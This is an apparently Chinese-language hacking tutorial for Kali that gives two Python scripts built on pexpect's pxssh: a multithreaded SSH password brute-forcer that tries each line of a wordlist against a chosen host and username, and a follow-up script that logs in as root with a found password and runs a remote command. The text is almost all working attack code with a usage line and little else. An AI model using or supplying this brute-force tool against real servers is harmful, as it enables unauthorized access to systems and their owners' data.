释放双眼,带上耳机,听听看~!
利用Pxssh是pexpect库的ssh专用脚本
环境:kali
代码:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
2Author:yw
3'''
4from pexpect import pxssh
5import optparse
6from threading import *
7
8Max_Connect = 5
9connection_lock = BoundedSemaphore(value=Max_Connect)
10
11def connect(host, user, password):
12 try:
13 s = pxssh.pxssh()
14 s.login(host, user, password)
15 print("[+]Password Found:"+password)
16 Found = True
17 except Exception as e:
18 pass
19def main():
20 parser = optparse.OptionParser('usage %prog -H <target host> -f <passwd file> -u <username>')
21 parser.add_option('-H', dest='host', type='string', help='target host')
22 parser.add_option('-f', dest='passwdfile',type='string', help='passwofile')
23 parser.add_option('-u', dest='user', type='string', help='login username')
24 (options,args) = parser.parse_args()
25 host = options.host
26 passwdfile = options.passwdfile
27 user = options.user
28 if host==None or passwdfile==None or user==None:
29 print(parser.usage)
30 exit(0)
31 mn = open(passwdfile,'r')
32 lines = mn.readlines()
33 for line in lines:
34 with connection_lock:
35 password = line.strip('\n')
36 print('[-] Test:'+str(password))
37 t = Thread(target=connect,args=(host, user, password))
38 t.start()
39if __name__ == '__main__':
40 main()
41
执行结果:
爆破成功后(远程执行上述命令)
代码:
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2Author:yw
3'''
4from pexpect import pxssh
5def send_shell(s,shell):
6 s.sendline(shell)
7 s.prompt()
8 print s.before
9def connect(host,user,password):
10 try:
11 s=pxssh.pxssh()
12 s.login(host,user,password)
13 return s
14 except:
15 print("[-] Error Connecting")
16 exit(0)
17s=connect('127.0.0.1','root','toor')
18send_shell(s,'uname -a')
19
20
